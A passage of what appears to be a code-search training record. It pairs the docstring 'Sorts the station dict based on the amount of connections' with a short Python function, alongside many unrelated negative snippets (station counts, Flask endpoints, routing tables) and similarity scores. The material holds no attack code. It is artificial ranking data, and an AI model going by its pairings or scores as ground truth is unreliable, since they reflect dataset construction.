unique_stations = list(set(data['start_station_name'].tolist() + data['end_station_name'].tolist()))\n\n station_counter = {station : 0 for station in unique_stations}\n for index, row in data.iterrows():\n station_counter[row['start_station_name']] += 1\n\n print('List of all stations:')\n print(unique_stations)\n\n keys = list(station_counter.keys())\n vals = list(station_counter.values())\n indexArr = np.argsort(list(station_counter.values()))\n popularStations = []\n for i in reversed(indexArr):\n popularStations.append((keys[i], vals[i]))\n\n stations1, journeys = zip(*popularStations[0:10])\n plt.bar(stations1, journeys, 0.1)\n\n plt.xticks(stations1, rotation='vertical')\n plt.title('Popular stations')\n plt.xlabel('Station names')\n plt.ylabel('Journeys')\n\n plt.show()\n return station_counter", "def tree(self):\n keys = [\n 'FirstTimeSeen',\n 'LastTimeSeen',\n 'channel',\n 'Speed',\n 'Privacy',\n 'Cipher',\n 'Authentication',\n 'Power',\n 'beacons',\n 'IV',\n 'LANIP',\n 'IDlength',\n 'ESSID',\n 'Key']\n\n c_keys = [\n 'Station MAC',\n 'FirstTimeSeen',\n 'LastTimeSeen',\n 'Power',\n 'Packets',\n 'BSSID',\n 'ProbedESSIDs'\n ]\n\n self.update_results()\n aps = {}\n for ap_ in self._aps:\n bssid = ap_.pop(0)\n aps[bssid] = dict(zip(keys, ap_))\n aps[bssid]['clients'] = []\n\n for client in self.clients:\n if client[0] == bssid:\n aps[bssid]['clients'].append(dict(zip(c_keys, client)))\n return aps", "def stations():\n results = session.query(Measurement.station).\\\n group_by(Measurement.station).all()\n\n return jsonify(results)", "def show_nt_msg(nt):\n\n nt_set = set(nt)\n nt_dict = {}\n\n for nt_node in nt_set:\n nt_dict[nt_node] = len(np.where(nt == nt_node)[0])\n\n return nt_dict", "def caculate_network_statistics(self):\n divide_factor_sum = 0 \n for key in self.stars.keys():\n star = self.stars[key]\n if star.nb_num == 0 :\n self.standalone_star_num += 1 \n\n divide_factor = star.nb_num + 2 * (star.spec_num - star.shared_spec_num )/self.ave_starlet_size\n divide_factor_sum += divide_factor\n divide_factor_int = round(divide_factor)\n self.star_divide_factor_dist[divide_factor_int] = self.star_divide_factor_dist.get(divide_factor_int,0) + 1\n if star.spec_num < star.shared_spec_num:\n print(\"!!!!!!!!!!!!Becareful, total spectra No is less than Shared Spectra with starlets\")\n print(\"with star \" + star.id + \" \" + str(star.spec_num) + \"is less than\" + str(star.shared_spec_num))\n if star.spec_num > star.shared_spec_num:\n self.star_lost_spec_num += star.spec_num - star.shared_spec_num\n self.ave_divide_factor_star = divide_factor_sum/self.stars_length\n\n divide_factor_sum = 0 \n for key in self.starlets.keys():\n starlet = self.starlets[key]\n if starlet.nb_num == 0 :\n self.standalone_starlet_num += 1 \n\n divide_factor = starlet.nb_num + 2 * (starlet.spec_num - starlet.shared_spec_num )/self.ave_star_size\n divide_factor_sum += divide_factor\n divide_factor_int = round(divide_factor)\n self.starlet_divide_factor_dist[divide_factor_int] = self.starlet_divide_factor_dist.get(divide_factor_int,0) + 1\n if starlet.spec_num < starlet.shared_spec_num:\n print(\"!!!!!!!!!!!!Becareful, total spectra No is less than Shared Spectra with starlets\")\n print(\"with star \" + starlet.id + \" \" + str(starlet.spec_num) + \"is less than\" + str(starlet.shared_spec_num))\n if starlet.spec_num > starlet.shared_spec_num:\n self.starlet_lost_spec_num += starlet.spec_num - starlet.shared_spec_num\n self.ave_divide_factor_starlet = divide_factor_sum/self.starlets_length", "def counts(self) -> dict:\n return Counter(self.sequence)", "def num_requests_sent(self):\n return dict(self._requests_count)", "def _get_shareable_meas_dict(self, last_shared_index):\n meas_dict = {}\n explicit_count = 0\n for i in range(last_shared_index, len(self.ledger)):\n for meas in self.ledger[i][\"meas\"]:\n if self._is_shareable(meas.src_asset, meas.meas_type):\n msg_id = self._get_meas_identifier(meas)\n if msg_id not in meas_dict:\n meas_dict[msg_id] = {\"times\" : [],\"explicit\" : []}\n meas_dict[msg_id][\"times\"].append( meas.stamp )\n if \"implicit\" not in meas.meas_type:\n meas_dict[msg_id][\"explicit\"].append( meas )\n explicit_count += 1\n # print(\"Delta: {} | Explicit Count creating meas dict: {}\".format(self.delta_multiplier, explicit_count))\n return meas_dict", "def summarize(self) -> Mapping[str, int]:\n return dict(\n compounds=self.count_compounds(),\n side_effects=self.count_side_effects(),\n indications=self.count_indications(),\n umls=self.count_umls(),\n )", "def extract_connection_properties(self):\n try:\n localdict = {\"MQTT\" : {\\\n \"address\" : self.config_handle['MQTT']['MQTTBrokerAddress'],\\\n \"port\" : int(self.config_handle['MQTT']['MQTTBrokerPort']),\\\n \"topic\" : self.config_handle['MQTT']['MQTTTopic']},\\\n \"KAFKA\" : {\\\n \"address\" : self.config_handle['Kafka']['KafkaBrokerAddress'],\\\n \"port\" : int(self.config_handle['Kafka']['KafkaBrokerPort']),\\\n \"topic\" : self.config_handle['Kafka']['KafkaTopic']}\\\n }\n self.connection_information.append(localdict)\n except:\n print(\"Error in extracting connection properties\")", "def make_connections(self):\n return\n destinations={}\n sources={}\n for gsq in self.gatesqs:\n destinations[self.local2global(gsq)]=set()\n sources[self.local2global(gsq)]=set()\n if rm.all_sols=='timeout':\n return\n for sol in self.all_sols:\n for sa in sol:\n start,indv,path,covered,end=sa\n destinations[self.local2global(start)].add((self.local2global(end),tuple(path)))\n sources[self.local2global(end)].add((self.local2global(start),tuple(path)))\n self.sources=sources\n self.destinations=destinations", "def operation_counts(self) -> Dict[int, Dict[str, int]]:\n return self._operation_counts", "def properties(self):\n\n dict = {\"Host Name\":self.host, \"Stellar Mass\":self.st_mass,\n \"Stellar Radius\":self.st_rad}\n\n return dict", "def makeGraphDictionary(self):\n graph_dict_incomplete = {}\n # dictionary contains all links, no matter if they are functional\n for i in range(0, len(self._partner_indices)):\n graph_dict_incomplete[i] = set(self._partner_indices[i])\n if self._variant[0] == \"V0_instant\":\n self.graph_dict = graph_dict_incomplete\n else:\n # helper\n link_list = []\n link_list2 = []\n for vertex in graph_dict_incomplete:\n self.setKeyDictionary(dictionary=self.graph_dict,\n key=vertex,\n value=set())\n for neighbour in graph_dict_incomplete[vertex]:\n # Iterate through all plants and the neighbours\n # If a new pair occurs it will be appended in link_list2\n # If the pair occurs again it wll be appended in link_list\n # This means that the link (or rgf process) is finished\n # for both plants\n if {neighbour, vertex} not in link_list2:\n link_list2.append({vertex, neighbour})\n else:\n # plants are only put in the dict. if they occur more\n # than once, i.e. both partners have finished rgf\n link_list.append({vertex, neighbour})\n self.setKeyDictionary(dictionary=self.graph_dict,\n key=vertex,\n value=neighbour)", "def stations():\n \n # Query all the stations\n results = session.query(Station).all()\n\n # Create a dictionary to append the station data\n stations_info = []\n for stations in results:\n stations_dict = {}\n stations_dict[\"Station\"] = stations.station\n stations_dict[\"Station Name\"] = stations.name\n stations_dict[\"Latitude\"] = stations.latitude\n stations_dict[\"Longitude\"] = stations.longitude\n stations_dict[\"Elevation\"] = stations.elevation\n all_stations.append(stations_dict)\n \n return jsonify(stations_info)", "def db_info() -> dict[str, int]:\n\n def count(table: str) -> int:\n stmt = f\"SELECT COUNT(*) FROM {table}\"\n cursor = session.execute(stmt)\n result: tuple[int, ...] | None = cursor.fetchone()\n return result[0] if result is not None else 0\n\n info = {\n \"user\": count(\"user\"),\n \"entourage\": count(\"friend\"),\n \"interaction\": count(\"interaction\"),\n \"status\": count(\"status\"),\n \"mention\": count(\"mention\"),\n \"urls\": count(\"link\"),\n \"hashtags\": count(\"hashtag\"),\n }\n return info", "def to_dict(self) -> dict:\n temp = self.algo_state.copy()\n temp.update(\n {\n \"next\": self.next_session,\n \"last\": self.last_session,\n \"pastq\": pack_int_list(self.past_quality),\n \"reps\": self.actual_repetitions,\n \"algo\": self.algo,\n \"sbx\": self.version,\n }\n )\n return temp", "def device_info(self):\n info = {\n \"connections\": {(CONNECTION_NETWORK_MAC, self._data[\"port-mac-address\"])},\n \"manufacturer\": self._ctrl.data[\"resource\"][\"platform\"],\n \"model\": self._ctrl.data[\"resource\"][\"board-name\"],\n \"name\": f\"{self._inst} {self._data['default-name']}\",\n }\n return info", "def read_stations(station_file):\n log.info('Reading seiscomp3 exported stations file')\n stations_dict = {}\n with open(station_file, 'r') as csv_file:\n reader = csv.reader(csv_file)\n next(reader) # skip header\n for sta in reader:\n stations_dict[sta[0]] = Station(\n sta[0], float(sta[1]), float(sta[2]), float(sta[3]), sta[4]\n )\n log.info('Done reading seiscomp3 station files')\n return stations_dict", "def get_connection_data() -> Dict[str, Any]:\n conn_info = {\n \"host\": os.environ[\"HOST\"],\n \"port\": os.environ[\"PORT\"]\n }\n return conn_info" ]
[ "0.66026574", "0.6212001", "0.61680955", "0.61130697", "0.60983795", "0.60969037", "0.6081789", "0.6016051", "0.59923977", "0.58641666", "0.5816404", "0.58135796", "0.5811761", "0.5791444", "0.5785143", "0.577446", "0.5770902", "0.57675856", "0.5764687", "0.57554936", "0.5753903", "0.574948", "0.5734664", "0.5732042", "0.5731708", "0.5730051", "0.57246375", "0.57243097", "0.57074004", "0.5702683", "0.5683957", "0.5677825", "0.56634355", "0.56528443", "0.5641211", "0.5639784", "0.5625584", "0.5607324", "0.55960953", "0.5582676", "0.557891", "0.55760634", "0.5573198", "0.5562952", "0.5560744", "0.55526775", "0.5527399", "0.55245125", "0.55220616", "0.55068654", "0.5501996", "0.54838103", "0.54833895", "0.54703647", "0.54654515", "0.5465077", "0.5452919", "0.54498094", "0.544863", "0.54458725", "0.5430243", "0.5424529", "0.54242873", "0.54178303", "0.5409625", "0.5400791", "0.539201", "0.5391046", "0.53859484", "0.53787434", "0.5377072", "0.53679866", "0.53644055", "0.536112", "0.53504336", "0.53430367", "0.53327525", "0.5332685", "0.5332022", "0.53315806", "0.5317594", "0.5315775", "0.5313016", "0.5287644", "0.5287152", "0.5279283", "0.5277042", "0.5273758", "0.5265886", "0.5259422", "0.52587014", "0.5254867", "0.5249123", "0.5248353", "0.52453125", "0.5243178", "0.5226112", "0.52221906", "0.52200115", "0.52169603" ]
0.8745632
0
Sorts the station dict based on the amount of connections (value).
def create_station_list(self): sorted_station_list = sorted(self.station_dict, key=self.station_dict.get) return sorted_station_list
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def sort(self):\n\t\tself.servers = sorted(self.servers, key=lambda s: s.load)\n\t\tself.servers = sorted(self.servers, key=lambda s: s.distance_class)\n\t\tself.servers = sorted(self.servers, key=lambda s: s.country == self.locale_info.country, reverse=True)", "def _get_sorted_by_n_connections(m):\n small = nx.Graph()\n for k, v in m.items():\n small.add_edge(k[0], k[1])\n return sorted(small.adj, key=lambda x: len(small[x])), small", "def _sort_compounds(self):\n self.sorted_molecules = sorted(self.values(), key=operator.attrgetter('criterion'))", "def make_station_dict(self):\n self.station_dict = {}\n\n # interates over stations and puts the amount of connections in the dict\n for station in self.stations:\n length = len(self.stations[station].connections)\n self.station_dict[station] = length\n \n return self.station_dict", "def sort_bike_stations(bike_stations, location):\n\n stations = bike_stations.copy()\n\n for index, station in enumerate(stations):\n station_location = (station[\"lat\"], station[\"lon\"])\n dist = distance.distance(station_location, location).m\n stations[index][\"distance\"] = dist\n\n stations = sorted(stations, key=lambda station: station[\"distance\"])\n stations = list(filter(lambda station: station[\"bikesAvailable\"] > 0, stations))\n\n return stations", "def sortDistance(netlist):\n netlist_dictionary = {}\n for i in range(len(netlist)):\n start = chips[netlist[i][0]]\n end = chips[netlist[i][1]]\n\n delta_x = abs(start[0]-end[0])\n delta_y = abs(start[1]-end[1])\n distance = delta_x + delta_y\n\n netlist_dictionary[(netlist[i][0], netlist[i][1])] = distance\n\n sorted_dictionary = sorted(netlist_dictionary.items(), key=operator.itemgetter(1))\n sorted_netlist = []\n for j in range(len(sorted_dictionary)):\n sorted_netlist.append(sorted_dictionary[j][0])\n\n return sorted_netlist", "def get_top_station_set(city):\n s = {}\n for file in os.listdir(exp_data_path + os.sep + 'station' + os.sep + city):\n with open(exp_data_path + os.sep + 'station' + os.sep + city + os.sep + file) as f:\n reader = csv.reader(f)\n for row in reader:\n if row[0] not in s:\n s[row[0]] = 1\n else:\n s[row[0]] = s[row[0]] + 1\n\n sort_s = dict(sorted(s.items(), key=lambda x : x[1], reverse=True))\n first = True\n res = []\n for k, v in sort_s.items():\n if first:\n top = v\n first = False\n if top - v <= 30:\n res.append(k)\n print('before', len(sort_s))\n print('after', len(res))\n\n # restore new map [old_index, new_index]\n list_remap = {}\n new_index = 0\n for index in range(0, data_length[city]):\n if str(index) in res:\n list_remap[index] = new_index\n new_index = new_index + 1\n\n # print(list_remap)\n check_path(exp_data_path + os.sep + 'station_list')\n file_name = exp_data_path + os.sep + 'station_list' + os.sep + 'list_remap_{}'.format(city) + '.npy'\n if os.path.exists(file_name):\n os.remove(file_name)\n np.save(file_name, list_remap)", "def _topological_sort(self):\n self._reset_topological_order()\n\n def is_connected(src, dst):\n \"\"\"Judge two node whether are connected.\"\"\"\n for precursor in dst.precursor_nodes:\n if src == precursor.split(\":\")[0]:\n return 1\n return 0\n\n idx = 0\n while idx < len(self._topological_order):\n cur_node_name = self._topological_order[idx]\n cur_node = self.get_node(cur_node_name)\n # `scsr` is abbreviation for `successor`.\n for scsr_name in cur_node.successor_nodes:\n scsr_node = self.get_node(scsr_name)\n scsr_node.cur_in_degree -= is_connected(cur_node_name,\n scsr_node)\n if scsr_node.cur_in_degree == 0:\n self._topological_order.append(scsr_name)\n idx += 1\n self.sorted = True", "def resort(self):\n self.items.sort(key=lambda node: node.path_weight, reverse=True)", "def sort_values(self):\r\n for loopindex in range(0, self.population_size):\r\n index = self.cost_populations.index(min(self.cost_populations))\r\n \r\n if loopindex < int(self.population_size / 2):\r\n self.best_districts.append(self.district_population[index])\r\n self.best_costs.append(self.cost_populations[index])\r\n else:\r\n self.worst_districts.append(self.district_population[index])\r\n \r\n del self.cost_populations[index]\r\n del self.district_population[index]", "def sortdb():\n return sorted(donor_db.items(), key=sumdbkey, reverse=True)", "def compress(self):\n sorted_table = sorted(self.forwarding_table, reverse=True, key=lambda x: x[\"CIDR\"])\n i = 0\n while i + 1 < len(sorted_table):\n at_i = sorted_table[i]\n at_i_plus = sorted_table[i+1]\n if self.adj_numerically(at_i, at_i_plus) and self.same_attributes(at_i, at_i_plus):\n copy_of_route = self.aggregate_routes(at_i, at_i_plus)\n sorted_table[i] = copy_of_route\n sorted_table.pop(i+1)\n i += 1\n return sorted_table", "def sort_vnet(model, option='traffic'): \n failed_dict = model.failed_dict\n vnet_info = model.get_vnet_info()\n vnets = model.vnets\n vnet_traffic = {}\n for vn in vnets:\n failed_id = failed_dict[vn.vnet_id]\n failed_node_traffic = vnet_info[vn.vnet_id]['traffic'][failed_id][1]\n vnet_traffic[vn] = round(failed_node_traffic, 5)\n sorted_vn = sorted(vnet_traffic.iteritems(), key=operator.itemgetter(1)) \n sorted_vn.reverse()\n return sorted_vn", "def receive_routing_table(self, router):\n for network, distance in router.networks.items():\n # Only if the network doesn't exist in current routing table or\n # current distance is more than new info then add the new info\n if (network not in self.networks or\n self.networks[network] > distance + 1):\n self.networks[network] = distance + 1", "def sort_table(table, sats_table):", "def sorted_streams(streams):\n return sorted(streams, key=lambda s: len(streams[s][\"topic_data\"]), reverse=True)", "def sort_by_default(self):\n self.data.sort()", "def sorted_categories(self):\n count = lambda category: self.category_map[category]\n l = sorted(self.category_map, key=count, reverse=True)\n if len(l) > 5:\n return l[:5]\n else:\n return l", "def preference_ordering(self) -> None:\n for i in self._destinations:\n self._destinations[i] = sorted(self._destinations[i])", "def sort_by_area():\n # Create a list where index --> neuron and value --> area\n matched = [areas_from_channels[int(c)] for c in channels]\n # Find the indices (aka neurons) where they have a score < 2\n bad_indices = [i for i, score in enumerate(quality) if score[0] < 2]\n # Create a dictionary to sort neurons according to areas\n d = {}\n for index, area in enumerate(matched): # Iterate index and value together\n # Discard bad recordings\n if index not in bad_indices:\n # If the area is already a key then append this neuron index\n if area in d.keys():\n d[area].append(index)\n # Else create a new key for a single element list\n else:\n d[area] = [index]\n return d", "def make_tree(self):\n\n # list [station_name]\n visited = []\n\n # creates empty station object for each station and adds coordinates\n for station in self.stations:\n new_station = Station(station)\n coordinates = self.stations[station].get_coordinates()\n new_station.add_coordinates(coordinates[0], coordinates[1])\n\n # saves station in prims_tree dictionary\n self.prims_tree[station] = new_station\n\n # choose random beginning station\n random_station = random.choice(list(self.stations.values()))\n\n # sort station connections and retrieve shortest\n station_connections = random_station.get_connections()\n station_connections = sorted(station_connections.items(), key=operator.itemgetter(1))\n new_connection = station_connections.pop(0)\n new_station = new_connection[0]\n new_time = new_connection[1]\n\n # retrieve empty stations from prims_tree dictionary\n first_station = self.prims_tree[random_station.name]\n new_station = self.prims_tree[new_station.name]\n\n # add shortest connection to stations\n first_station.add_connection(new_station, new_time)\n new_station.add_connection(first_station, new_time)\n\n # add stations to visited\n visited.append(first_station.name)\n visited.append(new_station.name)\n\n # runs until all stations are visited\n while len(visited) is not len(self.prims_tree):\n # starts as arbitrarily high number\n min_connection_time = 9999\n\n # get connections of visited stations\n for station in visited:\n connections = self.stations[station].get_connections()\n\n # get time of connections\n for connection in connections:\n connection_time = connections[connection]\n\n # save smallest connection if time is smallest and station is not visited\n if connection.name not in visited and connection_time < min_connection_time:\n smallest_connection = self.prims_tree[connection.name]\n smallest_connection_station = self.prims_tree[station]\n min_connection_time = connection_time\n else:\n continue\n\n # add smallest connection to station in prims_tree dictionary\n smallest_connection_station.add_connection(smallest_connection, min_connection_time)\n smallest_connection.add_connection(smallest_connection_station, min_connection_time)\n\n # add new connection to visited list\n visited.append(smallest_connection.name)\n\n return self.prims_tree", "def dag_topology_sort(self):\n mlist = []\n mod_wrapper = self.mod_wrapper.copy()\n while mod_wrapper:\n temp_list = []\n for mod, wrapper in mod_wrapper.items():\n if wrapper.is_root_mod():\n temp_list.append(mod)\n wrapper.remove_self_from_bindings()\n\n for mod in temp_list:\n mod_wrapper.pop(mod, None)\n\n mlist += temp_list\n\n mod_wrapper_sort = {}\n for mod, i in zip(mlist, range(len(mlist))):\n self.mod_wrapper[mod].set_idx_name(i)\n mod_wrapper_sort[mod] = self.mod_wrapper[mod]\n\n self.mod_wrapper = mod_wrapper_sort", "def _sort_by_flows(stats_values):\n return sorted(stats_values, key=lambda entry: entry.flows, reverse=True)", "def _sort_by_satellite(self) -> Tuple[np.ndarray, np.ndarray, np.ndarray]:\n time = []\n satellite = []\n system = []\n for sat in sorted(self.dset.unique(\"satellite\"), reverse=True):\n idx = self.dset.filter(satellite=sat)\n time.extend(self.dset.time.gps.datetime[idx])\n satellite.extend(self.dset.satellite[idx])\n system.extend(self.dset.system[idx])\n \n return np.array([time]), np.array([satellite]), np.array([system])", "def alter_connection_order(connections, order, chip):\n # Sort the connections by distance between gates from shortest to longest\n if order >= 2:\n length_order = {}\n\n for connect in connections:\n reorder = connect.strip(\"\\n\").split(\",\")\n source_coords = [chip.gates[reorder[0]][\"x\"], chip.gates[reorder[0]][\"y\"], 0]\n target_coords = [chip.gates[reorder[1]][\"x\"], chip.gates[reorder[1]][\"y\"], 0]\n gate_dif = abs(source_coords[0] - target_coords[0]) + abs(source_coords[1] - target_coords[1])\n\n # Check if there are gates with the same distance\n while gate_dif in length_order:\n gate_dif += .1\n\n length_order[gate_dif] = connect\n\n sort = sorted(length_order)\n connections = [length_order[key] for key in sort]\n\n # Reverse the connections order\n if order == 1 or order == 3:\n connections = connections[::-1]\n\n return connections", "def hubs(self):\r\n cities = col.defaultdict(int)\r\n for code, _list in self.edges.items():\r\n for edge in _list:\r\n cities[code] += 1\r\n heap = [(-value, key) for key, value in cities.items()]\r\n largest = heapq.nsmallest(5, heap)\r\n largest = [(key, -value) for value, key in largest]\r\n return largest", "def sortby(self):\n ...", "def connected_component_statistics(self, printStats=False):\n lengths = self.connected_component_lengths()\n lengthDict = dict(collections.Counter(lengths))\n\n if printStats:\n orderedLengthDict = collections.OrderedDict(sorted(lengthDict.items()))\n numberOfGroups = nx.number_connected_components(self.return_undirected())\n for k, v in orderedLengthDict.iteritems():\n percent = round((100.00*v / numberOfGroups), 2)\n print str(k) + ' nodes: ' + str(v) + ' (' + str(percent) + '%) groups'\n print '-----------------------------------------'\n print 'TOTAL: ' + str(super(SynonymNetwork, self).number_of_nodes()) + ' nodes in network, ' + str(numberOfGroups) + ' distinct groups'\n else:\n return lengthDict", "def sort_mapping_by_size(cluster_mapping):\r\n\r\n return sorted(cluster_mapping.keys(),\r\n cmp=lambda a, b: cmp(len(a), len(b)),\r\n key=lambda k: cluster_mapping[k], reverse=True)", "def sorted_nodes(self):\r\n def is_source(node, connections):\r\n for connection in connections:\r\n if node == connection[1]:\r\n return False\r\n return True\r\n\r\n def source_connections(node, connections):\r\n conns = set()\r\n for connection in connections:\r\n if node == connection[0]:\r\n conns.add(connection)\r\n return conns\r\n\r\n nodes = set(self.nodes.values())\r\n connections = self.connections.copy()\r\n sorted_nodes = []\r\n\r\n # Find source nodes:\r\n source_nodes = set([n for n in nodes if is_source(n, connections)])\r\n\r\n # while S is non-empty do\r\n while source_nodes:\r\n # remove a node n from S\r\n node = source_nodes.pop()\r\n # insert n into L\r\n sorted_nodes.append(node)\r\n\r\n # for each node m with an edge e from n to m do\r\n s_connections = source_connections(node, connections)\r\n for connection in s_connections:\r\n # remove edge e from the graph\r\n m = connection[1]\r\n connections.remove(connection)\r\n # if m has no other incoming edges then\r\n # insert m into S\r\n if is_source(m, connections):\r\n source_nodes.add(m)\r\n\r\n # if graph has edges then\r\n # output error message (graph has at least one cycle)\r\n # else\r\n # output message (proposed topologically sorted order: L)\r\n\r\n if connections:\r\n raise Exception(\"Steram has at least one cycle (%d connections left of %d)\" % (len(connections), len(self.connections)))\r\n\r\n return sorted_nodes", "def _sort_ns(self):\n n = []\n for layer in self.structure:\n n.append(layer.get_index())\n n = np.asarray(n)\n return n", "def _rank_stations_by_distance_and_quality(lat, lon):\n\n station_ranking = rank_stations(lat, lon)\n station_ranking['enumerated_quality'] = station_ranking['rough_quality'].map(QUALITY_SORT)\n station_ranking = station_ranking.sort_values(by=['distance_meters', 'enumerated_quality'])\n return station_ranking", "def sort_final(y):\n with open(selected_pb, 'w') as outpb:\n pb = []\n for pr in y:\n pb.append({\n \"active\": pr[\"active\"],\n \"asn\": pr[\"asn\"],\n \"countrycode\": pr[\"countrycode\"],\n \"id\": pr[\"id\"],\n \"statecode\": pr[\"statecode\"],\n \"meta\": pr[\"meta\"],\n \"dist\": pr[\"dist\"]\n })\n datap = json.dumps(pb)\n outpb.write(datap)\n with open(selected_pb, 'r') as f:\n selected_dist = json.load(f)\n return selected_dist", "def sort_auto(self):\n key = lambda buz1, buz2: buz1 if buz1.trip_duration <= buz2.trip_duration else buz2\n self.autobuze.sort(key=key)", "def sort_links(links):\n\n temp_dict={}\n temp_list=[]\n sorted_list=[]\n ctr=0\n # Open the file where the results is saved and copy the tuple values into an empty list\n h=open('prresults.txt','r')\n for line in h:\n temp_list.append(line)\n #find the comma seperator between the key and the value, and\n #split them, in order to put in dic\n for x in temp_list:\n index=x.find(',')\n key=int(x[0:index])\n val=float(x[index+1:len(x)])\n for y in links:\n if y!= key and ctr==len(links):\n pass\n if y==key:\n temp_dict[key]=val\n break\n #Take dictionary, put it into a list of tuples, \n #then sort based on the pagerank value, rather then key\n sorted_list= temp_dict.items()\n sorted_list.sort(key=lambda x: x[1],reverse=True)\n \n h.close()\n return sorted_list", "def sort_rain_dictionary(raindata_dict_from_urlstream):\n\traindata_from_dictionary_to_sort = raindata_dict_from_urlstream.items() #[ [key, value] for key, value in raindata_dict.items() ] # .items() already gives the unpacking of the dictionary items\n\tsorted_dictionary_raindata = sorted(raindata_from_dictionary_to_sort, reverse=True) # Sort accept a second arguement kyword reverse=True Do not leave space on KEY assignment here only\n\treturn sorted_dictionary_raindata", "def _sort_routes(self):\n sorted_routes = OrderedDict()\n for inp_lab, inp in self.inputs.items():\n if inp_lab not in self.routes:\n continue\n sorted_routes[inp_lab] = OrderedDict()\n for out_lab, out in self.outputs.items():\n if out_lab not in self.routes[inp_lab]:\n continue\n routes = self.routes[inp_lab][out_lab]\n # If multiple routes between a certain input and output exist,\n # order the routes by length\n if len(routes) > 1:\n route_lengths = [len(route) for route in routes]\n sorted_indices = np.argsort(route_lengths)\n routes = [routes[i] for i in sorted_indices]\n sorted_routes[inp_lab][out_lab] = routes\n self.routes = sorted_routes", "def ResortPeers(self):\n \n self.sortedPeerList = []\n append = self.sortedPeerList.append\n for i in self.peerDatabase.keys():\n append((self.peerDatabase[i].RemainingRemoteStorage(), i))\n self.sortedPeerList.sort()\n self.sortedPeerList.reverse()", "def sort(self): # sort all entries to make room for new ones, determine best and worst\n ns = self.num_stored.value\n ys = np.asarray(self.ys[:ns])\n yi = ys.argsort()\n sortRuns = []\n for i in range(len(yi)):\n y = ys[yi[i]]\n xs = self.get_x(yi[i])\n sortRuns.append((y, xs))\n numStored = min(len(sortRuns),int(0.9*self.capacity)) # keep 90% best \n for i in range(numStored):\n self.replace(i, sortRuns[i][0], sortRuns[i][1])\n self.num_sorted.value = numStored \n self.num_stored.value = numStored \n return numStored", "def sortNgrams(hashtable):\n\tsorted = map(lambda (x, y): (y,x), hashtable.items())\n\tsorted.sort() # sort on basis of frequency\n\tsorted.reverse() # revert order: most frequent first\n\treturn map(lambda (y, x): (x, y), sorted)", "def sort_codon_table_by_frequency(codon_table: dict) -> dict:\n new_codon_table = dict()\n for letter, codon_frequencies in codon_table.items():\n new_codon_table[letter] = dict(sorted(codon_frequencies.items(), key=lambda x: x[1], reverse=True))\n return new_codon_table", "def sort_results(self):\n pass", "def connection_sort_key(conn):\n\n conn_rec_state = ConnRecord.State.get(conn[\"state\"])\n if conn_rec_state is ConnRecord.State.ABANDONED:\n pfx = \"2\"\n elif conn_rec_state is ConnRecord.State.INVITATION:\n pfx = \"1\"\n else:\n pfx = \"0\"\n\n return pfx + conn[\"created_at\"]", "def natsort(lst):\n lst.sort(key=natsort_key)", "def sort_values(self):\n self._elements = list(\n _[-1] for _ in sorted((e.value, e.weight, e) for e in self)\n )", "def sortedItems (dict):\n items = dict.items ()\n items.sort ()\n return items", "def get_three_largest_stations_graph(filename):\n with open(filename) as f_in:\n reader = csv.DictReader(f_in)\n station = {} # This is a {station-id: station-name} dictionary. It is more efficient by using id.\n start_station_number = {} # This is a {station-id: number of connections} dictionary.\n start_station_route = {} # This is a {start-id: {end_id: number of connections}} dictionary.\n\n largest_station_id = 0\n largest_station_times = 0\n second_largest_station_id = 0\n second_largest_station_times = 0\n third_largest_station_id = 0\n third_largest_station_times = 0\n for row in reader:\n start_id = row['start station id']\n end_id = row['end station id']\n if station.get(start_id) is None:\n station[start_id] = row['start station name']\n if station.get(end_id) is None:\n station[end_id] = row['start station name']\n if start_station_route.get(start_id) is None:\n start_station_route[start_id] = {}\n start_station_route[start_id][end_id] = 1\n start_station_number[start_id] = 1\n else:\n start_station_number[start_id] += 1\n if start_station_route[start_id].get(end_id) is None:\n start_station_route[start_id][end_id] = 1\n else:\n start_station_route[start_id][end_id] += 1\n\n times = start_station_number[start_id]\n if times > third_largest_station_times:\n if times >= second_largest_station_times:\n if times >= largest_station_times:\n # If this one is the largest one, only adding the largest by one\n if start_id != largest_station_id:\n third_largest_station_id = second_largest_station_id\n third_largest_station_times = second_largest_station_times\n second_largest_station_id = largest_station_id\n second_largest_station_times = largest_station_times\n largest_station_id = start_id\n largest_station_times += 1\n else:\n # If this one is the second largest one, only adding the second largest by one\n if start_id != second_largest_station_id:\n third_largest_station_id = second_largest_station_id\n third_largest_station_times = second_largest_station_times\n second_largest_station_id = start_id\n second_largest_station_times = times\n else:\n third_largest_station_id = start_id\n third_largest_station_times = times\n\n # print the largest three stations information\n largest_station = station[largest_station_id]\n second_largest_station = station[second_largest_station_id]\n third_largest_station = station[third_largest_station_id]\n print(\"The largest three stations in NYC are {}, {}, and {}.\"\n .format(largest_station, second_largest_station, third_largest_station))\n print(\"{} has {} connections with {} stations.\".\n format(largest_station, largest_station_times, len(start_station_route[largest_station_id])))\n print(\"{} has {} connections with {} stations.\".\n format(second_largest_station, second_largest_station_times,\n len(start_station_route[second_largest_station_id])))\n print(\"{} has {} connections with {} stations.\".\n format(third_largest_station, third_largest_station_times,\n len(start_station_route[third_largest_station_id])))\n\n # sort the station_route by numbers of connections and get the first ten start-end connections\n largest_station_graph = get_station_graph(largest_station_id,\n sort_end_station_list(start_station_route[largest_station_id]))\n second_largest_station_graph = get_station_graph(second_largest_station_id, sort_end_station_list(\n start_station_route[second_largest_station_id]))\n third_largest_station_graph = get_station_graph(third_largest_station_id, sort_end_station_list(\n start_station_route[third_largest_station_id]))\n\n # convert the station-id back to station-name\n largest_station_graph = get_station_name(largest_station_graph, station)\n second_largest_station_graph = get_station_name(second_largest_station_graph, station)\n third_largest_station_graph = get_station_name(third_largest_station_graph, station)\n\n return largest_station_graph, second_largest_station_graph, third_largest_station_graph", "def _sort(self):\n self.population.sort()\n self.population.reverse()", "def sorting_dict(self):\n ### take length of key and write in new dictionary repaired number without dots\n d_rekey = dict()\n l_rekey = list()\n # take max level of hash\n level = self.take_max_level()\n for k,v in self.d.items():\n l_key = k.split(\":\")\n delta = level - len(l_key)\n new_key = (\"\".join(l_key) + str(0)*delta)[1:]\n d_rekey[new_key] = k\n l_rekey.append(int(new_key))\n l_rekey.sort()\n return l_rekey, d_rekey", "def sort_by_ip(unsorted):\n by_ip = {}\n\n for k, v in unsorted.items():\n for ip in v:\n if ip in by_ip and k not in by_ip[ip]:\n by_ip[ip].append(k)\n else:\n by_ip[ip] = [k]\n\n return OrderedDict(sorted(by_ip.items()))", "def sort(self):\r\n\t\tif ScoreOpt.isGroupVassals():\r\n\t\t\tself._playerScores.sort(lambda x, y: 